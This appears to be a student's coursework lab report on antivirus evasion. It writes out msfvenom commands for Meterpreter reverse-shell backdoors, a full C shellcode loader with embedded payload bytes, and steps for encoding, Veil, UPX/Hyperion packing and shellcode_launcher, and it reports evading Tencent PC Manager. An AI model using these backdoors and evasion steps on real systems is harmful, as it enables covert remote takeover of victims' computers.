2019-2020-2 20175216 《网络对抗技术》Exp3 免杀原理与实践 2019-2020-2 20175216 《网络对抗技术》Exp3 免杀原理与实践

1.正确使用msf编码器，msfvenom生成如jar之类的其他文件，veil-evasion，自己利用shellcode编程等免杀工具或技巧

正确使用msf编码器

• 使用msfvenom -l encoders查看可以使用的编码器来生成不同的后门，更多的参数可以参考msfvenom一些基本用法
  

• 对实验二生成的20175216_backdoor.exe后门程序用VirusTotal进行扫描，结果如下图所示：
  

• 对实验二生成的20175216_backdoor.exe后门程序，用virscan进行扫描，扫了两次结果不一样，一次为危险，另一次为提醒（总感觉这杀软网站差点意思）扫描结果如下图所示：
  

• 使用msf编码器对后门程序进行一次到多次的编码，并进行检测。
• 一次编码：msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b 'x00' LHOST=192.168.170.142 LPORT=5216 -f exe > zxy-encoded.exe（LHOST=Attacker's IP ，使用-p 来指定要使用的payload，使用-b选项设定了规避字符集，会自动调用编码器，使用-f 来指定payload的输出格式）

• 对生成的zxy-encoded.exe后门程序，使用VirusTotal进行扫描，扫描结果如下图所示：
  

• 十次编码：msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b 'x00' LHOST=192.168.170.142 LPORT=5216 -f exe > zxy-encoded10.exe进行10次编码降低被查杀概率

• 对生成的zxy-encoded10.exe后门程序，使用VirusTotal进行扫描，扫描结果如下图所示：
  

msfvenom生成jar文件

• msf生成jar文件msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.170.142 LPORT=5216 x> zxy_backdoor_java.jar
  

• • 对生成的zxy_backdoor_java.jar后门文件，使用VirusTotal进行扫描，扫描结果如下图所示
    

msfvenom生成php文件

• msf生成php文件msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.170.142 lport=5216 x> zxy_backdoor.php
  
• 对生成的zxy_backdoor.php后门文件，使用VirusTotal进行扫描，扫描结果如下图所示
  

msfvenom生成apk文件

• msf生成apk文件msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.170.142 lport=5216 x> zxy_backdoor.apk
  
• 对生成的zxy_backdoor.apk后门文件，使用VirusTotal进行扫描，扫描结果如下图所示
  

veil

• 1、安装过程
• 更换镜像源，更换阿里云镜像源和中科大镜像源都可以，我选择的阿里云的镜像源具体，可以参考kali linux 更换镜像源
• 安装以下软件

sudo apt-get install libncurses5*
sudo apt-get install libavutil55*
sudo apt-get install gcc-mingw-w64*
sudo apt-get install wine32
sudo apt-get update

• 安装veil

sudo apt-get install veil-evasion

• 选择输入s，安装时默认选择提示选项
  

• 2、使用veil生成后门文件

• 安装成功，veil 指令进入界面
  

• 可以输入指令use 1使用veil-evasion
  

• 输入指令list
  

• 输入命令use 22进入配置界面
  

• 设置端口号和IP地址

set LHOST 192.168.170.142//设置反弹连接IP
set LPORT 5216//设置端口

• 输入generate生成文件，接着输入你想要payload的名字：veil_ps_5216，文件保存路径为：/var/lib/veil/output/source/veil_ps_5216.bat
  

• 对生成的veil_ps_5216.bat后门文件，使用VirusTotal进行扫描，扫描结果如下图所示，和原来也差不多
  

• 生成一个veil_py_5216.py文件（和上述步骤一样）,使用VirusTotal进行扫描，扫描结果如下图所示，检出率比上面检测的所有文件都要低，看来不同的文件类型，检出率也不一样
  

使用C + shellcode编程

• 使用命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.170.142 LPORT=5216 -f c生成shellcode
  

• 新建20175216.c

unsigned char buf[] = 
"xfcxe8x82x00x00x00x60x89xe5x31xc0x64x8bx50x30"
"x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26x31xff"
"xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf2x52"
"x57x8bx52x10x8bx4ax3cx8bx4cx11x78xe3x48x01xd1"
"x51x8bx59x20x01xd3x8bx49x18xe3x3ax49x8bx34x8b"
"x01xd6x31xffxacxc1xcfx0dx01xc7x38xe0x75xf6x03"
"x7dxf8x3bx7dx24x75xe4x58x8bx58x24x01xd3x66x8b"
"x0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44x24"
"x24x5bx5bx61x59x5ax51xffxe0x5fx5fx5ax8bx12xeb"
"x8dx5dx68x33x32x00x00x68x77x73x32x5fx54x68x4c"
"x77x26x07x89xe8xffxd0xb8x90x01x00x00x29xc4x54"
"x50x68x29x80x6bx00xffxd5x6ax0ax68xc0xa8xaax8e"
"x68x02x00x14x60x89xe6x50x50x50x50x40x50x40x50"
"x68xeax0fxdfxe0xffxd5x97x6ax10x56x57x68x99xa5"
"x74x61xffxd5x85xc0x74x0axffx4ex08x75xecxe8x67"
"x00x00x00x6ax00x6ax04x56x57x68x02xd9xc8x5fxff"
"xd5x83xf8x00x7ex36x8bx36x6ax40x68x00x10x00x00"
"x56x6ax00x68x58xa4x53xe5xffxd5x93x53x6ax00x56"
"x53x57x68x02xd9xc8x5fxffxd5x83xf8x00x7dx28x58"
"x68x00x40x00x00x6ax00x50x68x0bx2fx0fx30xffxd5"
"x57x68x75x6ex4dx61xffxd5x5ex5exffx0cx24x0fx85"
"x70xffxffxffxe9x9bxffxffxffx01xc3x29xc6x75xc1"
"xc3xbbxf0xb5xa2x56x6ax00x53xffxd5";

int main()
{
    int (*func)() = (int(*)())buf;
    func();
}

• 使用mingw-w32将c语言文件生成exe文件i686-w64-mingw32-g++ 20175216.c -o 20175216.exe

• 对创建的20175216.exe后门文件，使用VirusTotal进行扫描，扫描结果如下图所示
  

• 然后把文件放到win10运行下试试，反正觉得肯定不行，这要行的话，我都害怕
  

加壳工具

• 给之前的生成的文件进行加壳操作,压缩壳upx进行加壳，指令为upx 20175216.exe -o 20175216_upx.exe
  
• 对创建的20175216_upx.exe后门文件，使用VirusTotal进行扫描，扫描结果如下图所示
  
• 加密壳（Hyperion）进行加壳,将加壳的文件复制到/usr/share/windows-resources/hyperion/中,输入命令wine hyperion.exe -v 20175216_upx.exe 20175216_hyperion_upx.exe
  

对创建的20175216_hyperion_upx.exe后门文件，使用VirusTotal进行扫描，扫描结果如下图所示,加壳之后检出率更高了

使用其他课堂未介绍方法

• 强制类型转换+shellcode
• 输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.170.142 LPORT=5216 -f c获取shellcode
  
• 新建zxy5216.c
  
• 使用mingw-w32将c语言文件生成exe文件i686-w64-mingw32-g++ zxy5216.c -o zxy5216.exe
  
• 对创建的zxy5216.exe后门文件，使用VirusTotal进行扫描，扫描结果如下图所示
  

2.通过组合应用各种技术实现恶意代码免杀

• 使用工具shellcode_launcher
• 先用Msfvenom生成raw格式的shellcode msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b 'x00' lhost=192.168.170.142 lport=5216 -f raw -o zxy5216.raw
  
• msfconsole开始监听
• 在shellcode_launcher-master文件打开cmd，运行指令shellcode_launcher.exe -i zxy5216.raw
  
  
  对创建的zxy5216.raw后门文件，使用VirusTotal进行扫描，扫描结果如下图所示
  
  真的没想到这个检出率真么低，用杀毒软件扫也没发生风险
  

3.用另一电脑实测，在杀软开启的情况下，可运行并回连成功，注明电脑的杀软名称与版本

电脑系统windows7 6.1.7601
杀软名称：腾讯电脑管家 13.5.20525.234

实验总结

1.实验中遇到的问题

• 无法定位软件包
  
• 更换镜像源，kali自带镜像源很多都不支持，建议更换阿里云。可以参考kali linux 更换镜像源

2.基础问题回答

（1）杀软是如何检测出恶意代码的？
1、一个可执行文件中如果包含特征码，即可执行文件中有一段或多段可疑数据如shellcode之类的，杀软就认为这是恶意代码。
2、一个程序如果有特征码且有未经授权的非法动作时，杀软检测为恶意代码。
（2）免杀是做什么？
免杀能够让恶意代码躲过杀软的检测对攻击机进行非法操作，达到自己攻击目的。
（3）免杀的基本方法有哪些？
1、改变特征码，如加壳、c语言调用shellcode
2、改变行为，尽量使用反弹式连接、减少对系统的修改

3.实践总结与体会

通过这次免杀实验，我看到了杀毒软件也有局限性，有些程序有风险，杀毒软件可能只是提示有风险，让你自己来决定要不要用这个程序，这个时候最好还是慎重一些，十有八九是木马，但有的时候也不是。
做实验的时候用了很多的方法，像加壳、veil等方法，都没实现免杀，但有些放在电脑里只要不运行，杀软也没杀出来，但只要运行，要么提示有风险，要么直接就给杀掉了，人家那些杀毒软件设计者肯定也都学过这些，所以，实现免杀还是要费一番大功夫的。

4.开启杀软能绝对防止电脑中恶意代码吗？

开启杀软不能绝对防止电脑中恶意代码，但相对可以降低电脑中恶意代码的概率，目前杀毒软件已经很完善了，毕竟都是大公司设计的软件，经过了无数次的升级，对电脑的保护已经特别到位。